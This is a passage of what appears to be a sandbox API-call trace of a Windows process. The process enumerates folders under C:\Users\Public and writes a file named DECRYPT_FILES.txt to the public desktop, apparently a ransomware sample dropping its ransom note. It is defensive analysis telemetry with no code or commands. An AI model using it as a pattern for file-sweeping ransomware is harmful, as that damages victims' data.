ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0054.149] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0054.149] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0054.149] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0054.149] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0054.149] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0054.150] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0054.150] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0054.150] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee6b0) returned 1 [0054.150] GetFullPathNameW (in: lpFileName="C:\\Users\\Public", nBufferLength=0x105, lpBuffer=0x1c0ee1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x0) returned 0xf [0054.150] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\", nBufferLength=0x105, lpBuffer=0x1c0ee140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\", lpFilePart=0x0) returned 0x10 [0054.150] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x1c0ee350 | out: lpFindFileData=0x1c0ee350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.150] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.150] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0054.151] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0054.152] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0054.152] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0ee3a0 | out: lpFindFileData=0x1c0ee3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.152] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee600) returned 1 [0054.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee5c0) returned 1 [0054.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.152] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0054.152] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\", lpFilePart=0x0) returned 0x18 [0054.152] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.152] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.153] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0054.153] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.153] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0054.153] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0054.153] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.153] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.153] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0054.153] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\", lpFilePart=0x0) returned 0x18 [0054.153] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.154] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.154] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0054.154] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.154] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0054.154] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0054.155] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0054.155] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edd00) returned 1 [0054.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edcc0) returned 1 [0054.155] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x29 [0054.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0edd20) returned 1 [0054.155] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\DECRYPT_FILES.txt" (normalized: "c:\\users\\public\\desktop\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.157] GetFileType (hFile=0x408) returned 0x1 [0054.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0edc90) returned 1 [0054.157] GetFileType (hFile=0x408) returned 0x1 [0054.157] WriteFile (in: hFile=0x408, lpBuffer=0x21e1ab0*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0edd68, lpOverlapped=0x0 | out: lpBuffer=0x21e1ab0*, lpNumberOfBytesWritten=0x1c0edd68*=0x9d5, lpOverlapped=0x0) returned 1 [0054.158] CloseHandle (hObject=0x408) returned 1 [0054.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0eddb0) returned 1 [0054.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x1c0ed8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0054.159] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x105, lpBuffer=0x1c0ed840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x0) returned 0x1a [0054.159] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x1c0eda50 | out: lpFindFileData=0x1c0eda50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.159] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.159] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.159] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x1c0edaa0 | out: lpFindFileData=0x1c0edaa0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0054.159] FindNextFileW (in: hFindFile=0x1a5de030, 